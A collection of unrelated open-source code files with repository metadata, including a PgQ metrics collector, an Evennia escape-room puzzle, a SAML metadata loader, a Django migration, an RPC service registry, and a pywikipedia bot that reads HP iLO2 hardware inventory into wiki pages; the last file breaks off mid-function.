"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 98,
"avg_line_length": 29.928571428571427,
"alnum_prop": 0.5767700875099443,
"repo_name": "impactlab/oeem-energy-datastore",
"id": "d40a6de3e4e6e78aa9f21d3fb185f98b1a495ee8",
"size": "1329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "datastore/migrations/0024_auto_20160525_2259.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1722"
},
{
"name": "Python",
"bytes": "218839"
},
{
"name": "Shell",
"bytes": "1348"
}
],
"symlink_target": ""
} |
"""
Collects metrics on queues and queue consumers from PgQ, a PostgreSQL-based
queueing mechanism (part of the Skytools utilities released by Skype.)
#### Dependencies
* psycopg2
#### Example Configuration
```
enabled = True
[instances]
[[database1]]
dsn = postgresql://user:secret@localhost
[[database2]]
dsn = host=localhost port=5432 dbname=mydb
```
"""
try:
import psycopg2
import psycopg2.extras
except ImportError:
psycopg2 = None
import diamond.collector
class PgQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(PgQCollector, self).get_default_config_help()
config_help.update({
"instances": "The databases to be monitored. Each should have a "
"`dsn` attribute, which must be a valid libpq "
"connection string."
})
return config_help
def get_default_config(self):
config = super(PgQCollector, self).get_default_config()
config.update({
'instances': {},
})
return config
def collect(self):
if psycopg2 is None:
self.log.error('Unable to import module psycopg2')
return None
for instance, configuration in self.config['instances'].iteritems():
connection = psycopg2.connect(configuration['dsn'])
connection.set_isolation_level(
psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT,
)
self._collect_for_instance(instance, connection)
def _collect_for_instance(self, instance, connection):
"""Collects metrics for a named connection."""
with connection.cursor() as cursor:
for queue, metrics in self.get_queue_info(instance, cursor):
for name, metric in metrics.items():
self.publish('.'.join((instance, queue, name)), metric)
with connection.cursor() as cursor:
consumers = self.get_consumer_info(instance, cursor)
for queue, consumer, metrics in consumers:
for name, metric in metrics.items():
key_parts = (instance, queue, 'consumers', consumer, name)
self.publish('.'.join(key_parts), metric)
QUEUE_INFO_STATEMENT = """
SELECT
queue_name,
EXTRACT(epoch from ticker_lag),
ev_per_sec
FROM pgq.get_queue_info()
"""
def get_queue_info(self, instance, cursor):
"""Collects metrics for all queues on the connected database."""
cursor.execute(self.QUEUE_INFO_STATEMENT)
for queue_name, ticker_lag, ev_per_sec in cursor:
yield queue_name, {
'ticker_lag': ticker_lag,
'ev_per_sec': ev_per_sec,
}
CONSUMER_INFO_STATEMENT = """
SELECT
queue_name,
consumer_name,
EXTRACT(epoch from lag),
pending_events,
EXTRACT(epoch from last_seen)
FROM pgq.get_consumer_info()
"""
def get_consumer_info(self, instance, cursor):
"""Collects metrics for all consumers on the connected database."""
cursor.execute(self.CONSUMER_INFO_STATEMENT)
for queue_name, consumer_name, lag, pending_events, last_seen in cursor:
yield queue_name, consumer_name, {
'lag': lag,
'pending_events': pending_events,
'last_seen': last_seen,
}
| {
"content_hash": "d9d0cfc16bfbb72f29d19766abaefd5a",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 80,
"avg_line_length": 31.684684684684683,
"alnum_prop": 0.5899914700028434,
"repo_name": "tusharmakkar08/Diamond",
"id": "8697c57ecdcd0ff61f3214d9878a3c4d85168070",
"size": "3517",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/collectors/pgq/pgq.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "21681"
},
{
"name": "Makefile",
"bytes": "4465"
},
{
"name": "Python",
"bytes": "1594589"
},
{
"name": "Roff",
"bytes": "23868"
},
{
"name": "Ruby",
"bytes": "230"
},
{
"name": "Shell",
"bytes": "12795"
}
],
"symlink_target": ""
} |
"""
Listening to the monkey automaton to open the closet
"""
import random
from evennia import DefaultScript
from evennia.utils import interactive
from ..state import BaseState
from .. import objects
GREETING = """
This is the situation, {name}:
The |rJester|n wants to win your village's yearly |wpie-eating contest|n.
As it turns out, you are one of her most dangerous opponents.
Today, the day of the contest, she invited you to her small cabin for a
'strategy chat'. But she tricked you and now you are |wlocked in|n! If you
don't get out before the contest starts she'll get to eat all those pies on
her own and surely win!
When you get into the cabin, The monkey-statue 'Vale' has just come alive
and walked over to the door. But he doesn't open it but instead turns around,
waves his long arms in the air and speaks ...
"""
ROOM_DESC = """
The |rJester's cabin|n is actually just a small single room with a *door.
Ample light enters from two *windows on each side. The underside of the sloping
roof is exposed (as are the *rafters holding them up), making the place taller
and feel more spacious than it is.
On the wall opposite the door is a small stone *fireplace, lined to the left
and right side by a tall *closet and an area acting as a *kitchen
respectively. There is also a carver *chair standing around.
Just to the right of the door is the Jester's messy *bed and to the right is
a long, empty-looking *table.
On the floor by the door is a plate on which sits a nicely smelling hintberry *pie.
*Vale has moved to stand just in front of the door, chattering to itself and
waving its arms above its head, excitedly.
"""
# -----------------------------------------------------------
# Vale (by the door, talking)
# ------------------------------------------------------------
STATUE_DESC = """
In front of the door stands a strange little moving statue depicting a strange
animal with a vaguely human-like face but long arms, ears and a tail. It's
dressed in a red jacket and a conical hat. Since hobbling here on its short
legs it has started waving its hands above its head, chattering excitedly to
itself in its strange, squeaky voice.
"""
STATUE_ARMS = """
The arms are made of wood and each joint is made out of wire. But this doesn't
seem to stop the thing from moving around as if it was alive. The finger joints
seem particularly flexible.
"""
STATUE_FACE = """
Vale's painted monkey face is made of wood. It is too big for the body on which
it sits, like a caricature of the animal. The black glass making out the
things' gleaming eyes seem to have been fitted in the face's empty eye sockets
after the face itself was carved.
"""
STATUE_DOOR = """
Vale chatters excitedly.
|w"I can see daylight through the keyhole! You just need to find the key.
Lemme help you out ...
... I saw my Mistress put the key in the cauldron. Just get it from there
and we'll be out into the sunshine in no time!"|n
"""
STATUE_WIND_TURNED = """
Vale, over by the door, seems to sniff the air.
|w"Huh. I think the wind just turned.|n
"""
STATUE_RHYME = """
Vale waggles his tail and weaves his hands in the arms as he recites:
|w"The Magus, the Smith and the Baker were once like glue
- but the Baker had bad pie and then they were only two.
The Magus and the Smith were once loving someone
- but the Smith's heart grew cold and then there was only one.
The Magus had a secret greater than he claimed
- but he drank too much of his wine, ashamed
And then only the Monkey remained."|n
"""
# four numbers are needed, count how many people are in each verse -> 3211. From
# the last verse it's suggested the Monkey was actually always there, so
# add one to the first three verses -> 4321
STATUE_RHYME_NOT_NEEDED = """
Vale looks at you. You swear the wooden face looks amused.
|w"You already figured this out, you know. But if you are so keen to hear my
Mistress' lovely prose again, who am to refuse?"|n
"""
STATUE_THINK = """
This silly little children's rhyme sounds just like something the Jester would
make up on the spot. This must be a hint to something else though. Maybe some
sort of code?
"""
STATUE_THINK_NOT_NEEDED = """
You already opened the closet by figuring out the rhyme. Surely Vale has served
its purpose now ... or?
"""
STATUE_HINTBERRY_PIE = """
From over by the door, Vale says:
|wIf you get stuck, you can always try eating a hintberry |cpie|w, you know ..."|n
"""
STATUE_RANDOM_CHATTER0 = """
Over by the door, Vale says aloud:
|w"The key to this door is over in the cauldron you know. Just get
it out of there so we can get us some sun!|n
"""
STATUE_RANDOM_CHATTER1 = """
Over by the door, Vale chatters to itself:
|w"I wonder whose face this is, really?|n"
"""
STATUE_RANDOM_CHATTER2 = """
Vale chatters to itself over by the door:
|w"My mistress cannot make herself take anything seriously ...!"|n
Vale quiets, mid-sentence.
"""
STATUE_RANDOM_CHATTER3 = """
Suddenly Vale continues a sentence out of the blue:
|w" ... not even if she wants to! Funny, but also a little sad, eh?"|n
"""
STATUE_RANDOM_CHATTER4 = """
Vale mutters over by the door:
|w"Nice day outside - I can see the sunlight through the keyhole!
Just need to find a key and then we'll be out of here!"|n
"""
STATUE_RANDOM_CHATTER5 = """
Over by the door, the monkey-thing hums contentedly to itself.
"""
STATUE_RANDOM_CHATTER6 = """
Vale talks to itself over by the door:
|w"My mistress had strict instructions for how I was to look, but the
blacksmith already had my face ready. Giving it to me made his heart
lighter, I think ...|n
The thing quiets, as if pondering.
"""
STATUE_RANDOM_CHATTER7 = """
Vale continues after a long pause:
|w"... Hey! I wonder if that was her plan all along."|n
"""
STATUE_RANDOM_CHATTER8 = """
Vale mumbles over by the door:
|w"You should not be too miffed with my Mistress for locking you in here
you know. She just has her .... own way of getting things done."|n
"""
STATUE_RANDOM_CHATTER9 = """
Vale mutters to itself over by the door, its words lost to the world.
"""
STATUE_RANDOM_CHATTERS = [
STATUE_RANDOM_CHATTER0,
STATUE_RANDOM_CHATTER1,
STATUE_RANDOM_CHATTER2,
STATUE_RANDOM_CHATTER3,
STATUE_RANDOM_CHATTER4,
STATUE_RANDOM_CHATTER5,
STATUE_RANDOM_CHATTER6,
STATUE_RANDOM_CHATTER7,
STATUE_RANDOM_CHATTER8,
STATUE_RANDOM_CHATTER9,
]
class StatueValeChatter(DefaultScript):
"""
Makes the statue chatter at random intervals.
"""
def at_script_creation(self):
self.key = "evscaperoom_vale_chatter"
self.start_delay = True
self.interval = 5 * 60
self.persistent = True
self.db.chatter_index = 0
def at_repeat(self):
if self.obj.room.state.name.endswith("state_005_wind_turns"):
# if wind changed, we want that every time
self.obj.room.msg_room(None, STATUE_WIND_TURNED)
elif self.obj.room.state.name.endswith("state_008_open_chest"):
# remind the player about the hintberry pie
self.obj.room.msg_room(None, STATUE_HINTBERRY_PIE.strip())
elif random.random() < 0.3:
# most of the time Vale says nothing on repeat
ind = self.db.chatter_index
if ind > 9:
# start randomize after all have been heard once
chatter = random.choice(STATUE_RANDOM_CHATTERS).strip()
else:
# step through each statement in turn
chatter = STATUE_RANDOM_CHATTERS[ind].strip()
self.db.chatter_index += 1
self.obj.room.msg_room(None, chatter)
class StatueVale(objects.EvscaperoomObject):
def at_object_creation(self):
super().at_object_creation()
self.scripts.add(StatueValeChatter)
self.db.rhyme_needed = True
def at_focus_arms(self, caller, **kwargs):
self.room.score(1, "consider Vale's arms")
self.msg_char(caller, STATUE_ARMS.strip())
def at_focus_face(self, caller, **kwargs):
self.room.score(1, "examine Vale's face")
self.msg_char(caller, STATUE_FACE.strip())
def at_focus_door(self, caller, **kwargs):
self.msg_char(caller, STATUE_DOOR.strip())
def at_focus_think(self, caller, **kwargs):
if self.db.rhyme_needed:
self.msg_char(caller, STATUE_THINK.strip())
else:
self.msg_char(caller, STATUE_THINK_NOT_NEEDED.strip())
def at_focus_rhyme(self, caller, **kwargs):
if self.db.rhyme_needed:
self.msg_char(caller, STATUE_RHYME.strip())
else:
self.msg_char(caller, (STATUE_RHYME_NOT_NEEDED.lstrip() + STATUE_RHYME.rstrip()))
def get_cmd_signatures(self):
txt = ("You might look at Vale's {callsigns}. You can also ask "
"to hear the *rhyme again, ask why he stands by the *door "
"or *think more on this.")
return ["arms", "face"], txt
# ------------------------------------------------------------
# closet
# ------------------------------------------------------------
CLOSET_DESC = """
The 'closet corner' of the cabin is dominated by the namesake closet. It's a
large antique piece of furniture, with double doors of lacquered hardwood.
The thing has a padlock with four spinning wheels on it.
"""
CLOSET_PADLOCK = """
The padlock is a metal construct with four wheels of numbers 0-9 on it. It
looks like you need to rotate these to set a given number.
"""
CLOSET_CODE_CORRECT = """
4,3,2,1 - the number of people mentioned in each of Vale's verses, including
the 'Monkey' that turned out to always be around as well.
The padlock clicks and the metal bar unlocks. But still - the code was just
4321? Seriously? What a stupid code. Typical of the Jester!
The doors to the closet swing open.
"""
class ClosetClosed(objects.CodeInput):
# The closet can now be opened
infinitely_locked = False
code = "4321"
code_hint = "four digits, 0 to 9"
read_flag = None
def at_focus_padlock(self, caller, **kwargs):
self.msg_char(caller, CLOSET_PADLOCK.strip())
@interactive
def at_code_correct(self, caller, code_tried, **kwargs):
self.msg_room(caller, "~You ~enter a code in the *padlock.")
self.room.score(2, "unlock the closet")
self.msg_room(caller, CLOSET_CODE_CORRECT)
yield(2)
self.next_state()
# -----------------------------------------------------------
# State
# ------------------------------------------------------------
STATE_HINT_LVL1 = """
Vale's rhyme tells a story involving a number of people. Maybe you need a code for something?
"""
STATE_HINT_LVL2 = """
The *closet is locked with a lock that requires four digits. The rhyme seems to have four stanzas.
"""
STATE_HINT_LVL3 = """
If you read between the lines, how many people are -actually- in each stanza of the rhyme?
"""
STATE_HINT_LVL4 = """
Enter the code '4321' into the closet lock. The number of people mentioned in each stanza is
3211, but the last line implies that the Monkey was always there without being mentioned
explicitly, so add +1 to the first three values.
"""
class State(BaseState):
next_state = "state_004_childmaker_potion"
hints = [STATE_HINT_LVL1,
STATE_HINT_LVL2,
STATE_HINT_LVL3,
STATE_HINT_LVL4]
def character_enters(self, character):
self.cinematic(GREETING.format(name=character.key),
target=character)
def init(self):
# room desc changed since Vale moved
self.room.db.desc = ROOM_DESC.strip()
# replace statue with one that speaks
statue = self.get_object("statue")
if statue:
statue.delete()
statue = self.create_object(
StatueVale, key="Vale", aliases=['statue', 'monkey'])
statue.db.desc = STATUE_DESC.strip()
closet = self.create_object(
ClosetClosed, key="closet")
closet.db.desc = CLOSET_DESC.strip()
self.room.msg_room(None, STATUE_RHYME.strip())
def clear(self):
super().clear()
self.room.progress(25)
| {
"content_hash": "c9611087af928bc26f859844375d49b9",
"timestamp": "",
"source": "github",
"line_count": 391,
"max_line_length": 98,
"avg_line_length": 31.437340153452684,
"alnum_prop": 0.6548161405792385,
"repo_name": "evennia/evdemo",
"id": "af7677a2ad793fac2262f9eca3d233076dc73cef",
"size": "12292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "evdemo/evscaperoom/states/state_003_locked_closet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "415277"
}
],
"symlink_target": ""
} |
from saml2.config import IdPConfig
from saml2.config import SPConfig
from saml2.mdstore import MetadataStore
__author__ = 'roland'
def load(insecure, conf, md_conf, typ):
try:
md_conf = conf["metadata"]
del conf["metadata"]
except KeyError:
pass
if typ == 'sp':
_cnf = SPConfig().load(conf)
else:
_cnf = IdPConfig().load(conf)
if insecure:
disable_validation = True
else:
disable_validation = False
mds = MetadataStore(_cnf.attribute_converters, _cnf,
disable_ssl_certificate_validation=disable_validation)
mds.imp(md_conf)
return mds
| {
"content_hash": "acad17b33655caf80e84bb2690c7a37f",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 78,
"avg_line_length": 21.966666666666665,
"alnum_prop": 0.6145675265553869,
"repo_name": "rohe/saml2test2",
"id": "82443216e7b898c7a007d0e2dcddbe7ba96407b9",
"size": "659",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/saml2test/metadata.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "1943"
},
{
"name": "HTML",
"bytes": "17445"
},
{
"name": "JavaScript",
"bytes": "746"
},
{
"name": "Python",
"bytes": "168164"
},
{
"name": "Shell",
"bytes": "126"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('courses', '0006_questions'),
('orders', '0005_product_hola'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='hola',
),
migrations.AddField(
model_name='product',
name='course',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='courses.Course'),
),
]
| {
"content_hash": "07e2fbf64de6d333ab7849c54c07ef10",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 137,
"avg_line_length": 26.291666666666668,
"alnum_prop": 0.5974643423137876,
"repo_name": "pauljherrera/avantiweb",
"id": "a7b45c022b3f6a6dbef59347fcfeb9c5150077d9",
"size": "704",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orders/migrations/0006_auto_20170421_1555.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "29018"
},
{
"name": "HTML",
"bytes": "144944"
},
{
"name": "JavaScript",
"bytes": "10076"
},
{
"name": "Python",
"bytes": "82419"
}
],
"symlink_target": ""
} |
import functools
from pyrpc.exceptions import DuplicatedMethodError
from pyrpc.exceptions import DuplicatedServiceError
from pyrpc.exceptions import RPCMethodNotFound
__SERVICES = {}
def get_service(name):
service = __SERVICES.get(name)
if service is None:
raise RPCMethodNotFound
return service
def add_service(service):
if service.name in __SERVICES:
raise DuplicatedServiceError('%s already registered' % service.name)
__SERVICES[service.name] = service
def remove_service(service):
if service.name in __SERVICES:
__SERVICES.pop(service.name)
class Service(object):
"""Remote Procedure Call Service."""
def __init__(self, name):
"""Create new .. class:RPCService instance
:param name: service name
"""
self.name = name
self.methods = {}
add_service(self)
def add_method(self, method, func, **kw):
"""Add new method.
:param method: name of the method
:param func: callable object
:raises DuplicatedMethodError: if the method name is already registered
"""
if method in self.methods:
msg = 'method %s already register for %s' % (method, self.name)
raise DuplicatedMethodError(msg)
if 'klass' in kw and not callable(func):
func = UnboundMethod(kw['klass'], func)
self.methods[method] = func
def method(self, method):
"""Decorator for registering new service method.
:param method: name of the method
"""
def wrapper(func):
self.add_method(method, func)
functools.wraps(func)
return func
return wrapper
def execute(self, method, request):
"""Execute a method.
:param method: name of the method
:param socket: websocket instance
:param id_: call id
:param params: method parameters
:raises RPCMethodNotFound: if the method does not exist
"""
func = self.methods.get(method)
if func is None:
raise RPCMethodNotFound
return func(request)
class UnboundMethod(object):
def __init__(self, klass, method):
self.klass = klass
self.method = method
self.__name__ = method
def __call__(self, request):
obj = self.klass(request)
method = getattr(obj, self.method)
return method()
| {
"content_hash": "f9c42bcb12f961394aea64a79ac9232a",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 26.42391304347826,
"alnum_prop": 0.613739201974496,
"repo_name": "winstonf88/pyrpc",
"id": "86b59c1c987037bfe19b720c762e53a7d25d21d8",
"size": "2431",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyrpc/service.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16485"
}
],
"symlink_target": ""
} |
from basicmvc.tests.basic_test import BasicTest
| {
"content_hash": "5478ae8ee0de32ab2535ad6120c40321",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 47,
"avg_line_length": 48,
"alnum_prop": 0.8541666666666666,
"repo_name": "LiorZ/pygame-mvc",
"id": "196b3031ec5e92932fb46e55911c4a99a37e4ce0",
"size": "48",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "basicmvc/tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2015"
}
],
"symlink_target": ""
} |
from flask import redirect, Module, url_for, request
main = Module(__name__)
@main.route('/')
def index():
return redirect(url_for('zones.zones_list'))
| {
"content_hash": "c79dee85f327c2c04b047cfad5051d65",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 52,
"avg_line_length": 19.875,
"alnum_prop": 0.6729559748427673,
"repo_name": "sysbot/route53manager",
"id": "9d7f0655a541f45a97c5d8901a495898b61f6c49",
"size": "159",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "route53/views/main.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
"""
import wikipedia
import pagegenerators, catlib, re, socket, sys
import base64
import struct
class ILO2InventoryBot:
def __init__(self, hosts_generator):
self.hosts_generator = hosts_generator
def run(self):
for page in self.hosts_generator:
if not "." in page.title(): continue
self.processpage(page)
def processpage(self, page):
wikipedia.setAction(u'Robot: update hardware inventory')
print page.title()
oldlines = page.get().split("\r\n")
newlines = list()
data = dict()
# find ILO IP, and fetch data
for line in oldlines:
if not line.startswith("|OOBIP="): continue
oobip = line.split("=")[1].replace("\r","")
print repr(oobip)
if oobip == "": continue
data = self.fetchIloData(oobip)
break
# do string formatting for RAMUSED
if data.has_key('ram'):
sizescount = dict()
for rammodule in data['ram']:
# ignore empty banks
if rammodule['size'] == 0: continue
if not sizescount.has_key(rammodule['size']): sizescount[rammodule['size']] = 0
sizescount[rammodule['size']] = sizescount[rammodule['size']] + 1
sizes = sizescount.keys()
sizes.sort(reverse=True)
ram = list()
for size in sizes:
ram.append('%dx %dMB' % (sizescount[size], size))
data['ram'] = " + ".join(ram)
if data.has_key('cpus'):
cputypes = dict()
for i in range(0, data['cpus']):
cputype = data['cpu'+str(i+1)]
if not cputypes.has_key(cputype): cputypes[cputype] = 0
cputypes[cputype] += 1
cpu = []
types = cputypes.keys()
types.sort()
for cputype in types:
cpu.append('%dx %s' % (cputypes[cputype], cputype))
data['cpu'] = ", ".join(cpu)
# now replace the values
for line in oldlines:
if line.startswith("|SN=") and data.has_key('serialnumber'):
line = "|SN=" + data['serialnumber']
del data['serialnumber']
if line.startswith("|PN=") and data.has_key('skunumber'):
line = "|PN=" + data['skunumber']
del data['skunumber']
if line.startswith("|OOBMAC") and data.has_key('oobmac'):
line = "|OOBMAC=" + data['oobmac']
del data['oobmac']
if line.startswith("|RAMUSED") and data.has_key('ram'):
line = "|RAMUSED=" + data['ram']
del data['ram']
if line.startswith("|CPUUSED") and data.has_key('cpu'):
line = "|CPUUSED=" + str(data['cpu'])
del data['cpu']
if line.startswith("|RPSUSED") and data.has_key('rpsused'):
line = "|RPSUSED=" + str(data['rpsused'])
del data['rpsused']
if line.startswith("|NICMAC1") and data.has_key('nicmac1'):
line = "|NICMAC1=" + str(data['nicmac1'])
del data['nicmac1']
if line.startswith("|NICMAC2") and data.has_key('nicmac2'):
line = "|NICMAC2=" + str(data['nicmac2'])
del data['nicmac2']
if line.startswith("}}"):
# hardware template is over, add probably missing lines
if data.has_key('skunumber'): newlines.append("|PN=" + data['skunumber'])
if data.has_key('rpsused'): newlines.append("|RPSUSED=" + str(data['rpsused']))
# now ensure that no other changes are made
data = dict()
newlines.append(line)
pagetext = "\r\n".join(newlines)
# save, if there are differences
if page.get() == pagetext: return
wikipedia.showDiff(page.get(), pagetext)
# Save the page
try:
page.put(pagetext)
except wikipedia.LockedPage:
wikipedia.output(u"Page %s is locked; skipping." % page.aslink())
except wikipedia.EditConflict:
wikipedia.output(u'Skipping %s because of edit conflict' % (page.title()))
except wikipedia.SpamfilterError, error:
wikipedia.output(u'Cannot change %s because of spam blacklist entry %s' % (page.title(), error.url))
def fetchIloData(self, iloaddress):
results = dict()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((iloaddress, 443))
except socket.gaierror:
return results
except socket.error:
return results
s = socket.ssl(sock)
xml_header = '<?xml version="1.0"?>'
xml = """<RIBCL version="2.21">
<LOGIN USER_LOGIN="%s" PASSWORD="%s">
<SERVER_INFO MODE="READ" >
<GET_HOST_DATA />
<GET_EMBEDDED_HEALTH />
</SERVER_INFO>
<RIB_INFO MODE="read">
<GET_NETWORK_SETTINGS/>
</RIB_INFO>
</LOGIN>
</RIBCL>
"""
xml = xml_header + "\n" + (xml % (wikipedia.config.bot_hpilo2_ilo_username, wikipedia.config.bot_hpilo2_ilo_password))
for line in xml.split("\n"):
s.write(line + "\r\n")
data = ""
while True:
try:
data = data + s.read()
if "</RIB_INFO>" in data: break
except socket.sslerror:
break
del s
sock.close()
# pre`split data
data = data.split("\n")
# preprocess hostdata, save away cache structs
in_host_data = False
cachestructs = {}
for line in data:
if '<GET_HOST_DATA>' in line:
in_host_data = True
continue
if '</GET_HOST_DATA>' in line:
in_host_data = False
continue
if not in_host_data: continue
if not '<SMBIOS_RECORD ' in line: continue
smbios_data = line.split("B64_DATA=\"")[1].split("\"")[0]
smbios_data = base64.b64decode(smbios_data)
if 'TYPE="7"' in line:
this = dict()
handle = struct.unpack('H', smbios_data[0x2:0x4])[0]
size = struct.unpack('H', smbios_data[0x9:0xB])[0] & 0xFF
size = size * 64
cachestructs[handle] = size
# now process data
in_host_data = False
for line in data:
if '<GET_HOST_DATA>' in line:
in_host_data = True
continue
if '</GET_HOST_DATA>' in line:
in_host_data = False
continue
if not in_host_data: continue
if not '<SMBIOS_RECORD ' in line: continue
smbios_data = line.split("B64_DATA=\"")[1].split("\"")[0]
smbios_data = base64.b64decode(smbios_data)
if 'TYPE="1"' in line:
# System ID
this = dict()
# byte 0 is the type, MUST be 1
# byte 1 is the length, on HP machines I've only observed 0x19 (SMBIOS v2.1-2.3.4) or 0x1Bh (2.4 or latter)
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
# byte 5 is the productname (string#)
self.from_smbios_string('productname', smbios_data, strings, length, 0x5, this)
# byte 6 is the version (string#)
self.from_smbios_string('version', smbios_data, strings, length, 0x6, this)
# byte 7 is the serialnumber (string#)
self.from_smbios_string('serialnumber', smbios_data, strings, length, 0x7, this)
# byte 8 is the uuid (16 bytes)
# byte 19 is the sku number (string#)
self.from_smbios_string('skunumber', smbios_data, strings, length, 0x19, this)
# byte 1a is the family (string#)
self.from_smbios_string('family', smbios_data, strings, length, 0x1a, this)
results.update(this)
if 'TYPE="4"' in line:
# CPU
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
if smbios_data[0x16] == '\x00' and smbios_data[0x17] == '\x00':
# no cpu present
pass
else:
this = dict()
self.from_smbios_string('socketname', smbios_data, strings, length, 0x4, this)
self.from_smbios_string('vendor', smbios_data, strings, length, 0x7, this)
this['cores'] = ord(smbios_data[0x23])
if this['cores'] == 2: this['corestr'] = 'Dual-Core'
if this['cores'] == 4: this['corestr'] = 'Quad-Core'
this['cpufamily'] = ord(smbios_data[0x6])
this['fsb'] = struct.unpack('H', smbios_data[0x12:0x14])[0]
this['speed'] = struct.unpack('H', smbios_data[0x16:0x18])[0]
this['sockettype'] = ord(smbios_data[0x19])
if this['sockettype'] == 0x15: this['socketstr'] = 'LGA775'
if this['sockettype'] == 0x14: this['socketstr'] = 'LGA771'
this['l2cachesize'] = cachestructs[struct.unpack('H', smbios_data[0x1C:0x1E])[0]]
# this is mad guesswork.
if this['cpufamily'] in (0xb3,0xaa): this['cpufamstr'] = 'Xeon'
if this['cpufamily'] == 0xb3 and this['fsb'] == 1066:
if this['cores'] == 2 and this['l2cachesize'] == 4096:
if this['speed'] == 2400: this['model'] = '3060'
if this['cpufamily'] == 0xb3 and this['fsb'] == 1333:
if this['cores'] == 2 and this['l2cachesize'] == 4096:
if this['speed'] == 2000: this['model'] = '5130'
if this['speed'] == 2333: this['model'] = '5140'
if this['speed'] == 2666: this['model'] = '5150'
if this['speed'] == 3000: this['model'] = '5160'
if this['cores'] == 4:
if this['l2cachesize'] == 8192:
if this['speed'] == 2000: this['model'] = 'E5335'
if this['speed'] == 2333: this['model'] = 'E5345'
if this['l2cachesize'] == 12288:
if this['speed'] == 2000: this['model'] = 'E5405'
if this['speed'] == 2333: this['model'] = 'E5410'
if this['speed'] == 2500: this['model'] = 'E5420'
if this['speed'] == 2666: this['model'] = 'E5430'
if this['speed'] == 2833: this['model'] = 'E5440'
if this['speed'] == 3000: this['model'] = 'E5450'
# Nehalem
if this['cpufamily'] == 0xaa and this['fsb'] == 133:
if this['cores'] == 4 and this['l2cachesize'] == 1024:
if this['speed'] == 2533: this['model'] = 'E5540'
if not this.has_key('model'):
print 'Unknown CPU, details: speed=%s, cores=%s, fsb=%s, family=%x, l2cache=%s' % (this['speed'], this['cores'], this['fsb'], this['cpufamily'], this['l2cachesize'])
this['model'] = 'UnknownCPU'
if not results.has_key('cpus'): results['cpus'] = 0
results['cpus'] += 1
thiscpu = 'cpu' + str(results['cpus'])
results[thiscpu] = '%s %s %s %s' % (this['vendor'], this['corestr'], this['cpufamstr'], this['model'])
if 'TYPE="17"' in line:
# Memory
this = dict()
length = ord(smbios_data[0x1])
strings = smbios_data[length:].split("\x00")
self.from_smbios_string('device_locator', smbios_data, strings, length, 0x10, this)
self.from_smbios_string('bank_locator', smbios_data, strings, length, 0x11, this)
this['size'] = struct.unpack('H', smbios_data[0x0c:0x0e])[0]
if not results.has_key('ram'):
results['ram'] = list()
results['ram'].append(this)
if 'TYPE="209"' in line:
# NIC Ethernet Addresses
results['nicmac1'] = "%02X:%02X:%02X:%02X:%02X:%02X" % (ord(smbios_data[6]), ord(smbios_data[7]), ord(smbios_data[8]), ord(smbios_data[9]), ord(smbios_data[10]), ord(smbios_data[11]))
results['nicmac2'] = "%02X:%02X:%02X:%02X:%02X:%02X" % (ord(smbios_data[14]), ord(smbios_data[15]), ord(smbios_data[16]), ord(smbios_data[17]), ord(smbios_data[18]), ord(smbios_data[19]))
in_network_settings = False
for line in data:
if not in_network_settings and not '<GET_NETWORK_SETTINGS>' in line: continue
if '<GET_NETWORK_SETTINGS>' in line:
in_network_settings = True
continue
if '</GET_NETWORK_SETTINGS>' in line:
in_network_settings = False
continue
if in_network_settings and '<MAC_ADDRESS' in line:
value = line.split("VALUE=\"")[1].split("\"")[0]
results['oobmac'] = value.upper()
in_power_supplies = False
this_power_supply = ''
results['rpsused'] = 0
for line in data:
if not in_power_supplies and not '<POWER_SUPPLIES>' in line: continue
if '<POWER_SUPPLIES>' in line:
in_power_supplies = True
continue
if '</POWER_SUPPLIES>' in line:
in_power_supplies = False
continue
if in_power_supplies:
if '<SUPPLY>' in line: this_power_supply = ''
if this_power_supply == None:
pass
elif this_power_supply == '':
if '<LABEL' in line: this_power_supply = line.split("Power Supply ")[1].split("\"")[0]
elif len(this_power_supply) > 0:
if '<STATUS' in line:
value = line.split("VALUE = \"")[1].split("\"")[0]
if value == "Ok": results['rpsused'] = results['rpsused'] + 1
if '</SUPPLY' in line: this_power_supply = None
return results
def from_smbios_string(self, name, smbios_data, strings, length, offset, this):
tmp = ''
if length >= offset:
stringid = ord(smbios_data[offset])
if stringid > 0 and len(strings) >= stringid:
tmp = strings[stringid-1].strip()
if tmp != '':
this[name] = tmp
def main():
gen = None
cat = catlib.Category(wikipedia.getSite(), 'Category:HP ILO2')
